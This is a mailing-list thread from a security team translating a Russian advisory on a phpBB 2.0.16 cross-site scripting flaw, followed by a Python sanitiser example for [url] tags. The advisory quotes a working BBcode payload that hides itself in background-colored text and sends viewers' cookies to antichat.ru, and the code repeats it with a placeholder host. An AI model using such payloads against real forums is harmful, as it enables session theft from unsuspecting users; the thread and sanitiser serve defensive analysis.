Steve Langasek
2006-Mar-13 12:28 UTC
[Secure-testing-team] Anyone speaking Russian among you?
On Wed, Jul 06, 2005 at 11:20:45AM +0200, Moritz Muehlenhoff wrote:
> Hi,
> These advisories on phpbb2 have been posted to Bugtraq. Unfortunately
> they are written in Russian:

> http://www.securitylab.ru/55612.html

Cross-site scripting with phpbb forums

Program: phpbb 2.0.16
Severity: low
Exploit available: yes

Description: a vulnerability in the phpbb forum allows a remote user to carry out an XSS attack. The remote user can insert a specially constructed combination of BB tags into forum messages to cause arbitrary code execution in the browser of a user that views the malicious message. The vulnerability can be used to steal the user's private information (session IDs or cookies).

Sample exploit:

[color=#EFEFEF][url]www.ut[url=www.s='' style='font-size:0;color:#EFEFEF 'style='top:expression(eval(this.sss)); 'sss=`i=new/**/Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; this.sss=null`style='font-size:0;] [/url][/url]'[/color]

Replace ????_???? (BACKGROUND_COLOR) with the value for the message background used by this forum skin. For the standard subsilver this is #EFEFEF. This is done so that the introduction of the exploit is not noticeable to the naked eye in other browsers where the code doesn't work, yadda yadda.

Author's URL: http://www.phpbb.com

Solution: there is no fix for this vulnerability at present.

Curiously, this seems to be nothing more than a bad copy from the second advisory, since there is obviously no occurrence of ????_???? in the sample exploit provided...

> http://antichat.ru/txt/phpbb/

Neither provides any information about a fix. The second one does go into more detail, but I'd imagine the sample exploit is the important part and the rest is ignorable. If not, Babelfish seems to be a surprisingly usable Russian-English translation dictionary -- I wonder why they can't do this good a job on the other languages.

:-)

-- 
Steve Langasek
postmodern programmer
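The advisory translated above relies on a `[url=...]` target being copied into HTML attribute text, with a second `[url=...]` nested inside the first to carry the injected `style=` attribute. The renderer below is an added illustration of the defensive side, not phpBB's own code: it allow-lists the link target and refuses nested tags outright rather than trying to clean them. The sample payload is constructed to match the shape of the advisory's exploit, with `collector.invalid` standing in for the cookie-collection host.

```python
import html
import re
from typing import Optional

# Constructed example, not phpBB's code: [url] renderer that allow-lists targets and refuses nesting.
URL_TAG = re.compile(r"\[url(?:=([^\]]*))?\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)

# Target allow-list: optional http(s) scheme, dotted hostname, optional port, then
# RFC 3986 URL characters only. No quotes, whitespace, backticks or brackets, so a
# target can never close the href or append a style= attribute as the sample does.
SAFE_URL = re.compile(
    r"^(?:https?://)?"
    r"[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+"
    r"(?::\d{1,5})?(?:[/?#][A-Za-z0-9\-._~:/?#@!$&()*+,;=%]*)?$",
    re.IGNORECASE,
)

# Constructed payload in the shape of the advisory's sample; collector.invalid is a placeholder.
ADVISORY_SHAPED = (
    "[color=#EFEFEF][url]www.ut[url=www.s='' style='font-size:0;color:#EFEFEF "
    "'style='top:expression(eval(this.sss)); 'sss=`i=new/**/Image(); "
    "i.src='http://collector.invalid/s.jpg?'+document.cookie; this.sss=null`"
    "style='font-size:0;] [/url][/url]'[/color]"
)

def safe_url(raw: str) -> Optional[str]:
    """Return a normalised http(s) URL, or None if the target is not a plain link."""
    candidate = raw.strip()
    if not SAFE_URL.match(candidate):
        return None
    # phpBB accepted bare hostnames ("www.ut"); give those an explicit scheme.
    return candidate if "://" in candidate else "http://" + candidate

def render_url_tags(message: str) -> str:
    """Render [url] tags to <a>; anything rejected is emitted as escaped text."""
    out, pos = [], 0
    for m in URL_TAG.finditer(message):
        out.append(html.escape(message[pos:m.start()], quote=True))
        label = m.group(2)
        target = label if m.group(1) is None else m.group(1)  # [url]x[/url] links to x
        href = safe_url(target)
        # The sample opens a second [url=...] inside the first: refuse, don't guess.
        if href is None or "[url" in label.lower():
            out.append(html.escape(m.group(0), quote=True))
        else:
            out.append('<a href="%s">%s</a>' % (html.escape(href, quote=True), html.escape(label, quote=True)))
        pos = m.end()
    out.append(html.escape(message[pos:], quote=True))
    return "".join(out)
```

Run against `ADVISORY_SHAPED` the output contains no markup at all, while an ordinary `[url=https://www.debian.org/security/]DSA list[/url]` still becomes a link.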
Moritz Muehlenhoff
2006-Mar-13 12:28 UTC
[Secure-testing-team] Anyone speaking Russian among you?
Hi,
These advisories on phpbb2 have been posted to Bugtraq. Unfortunately
they are written in Russian:

http://www.securitylab.ru/55612.html
http://antichat.ru/txt/phpbb/

[I've already sent the phpbb maintainer a pointer]

Moritz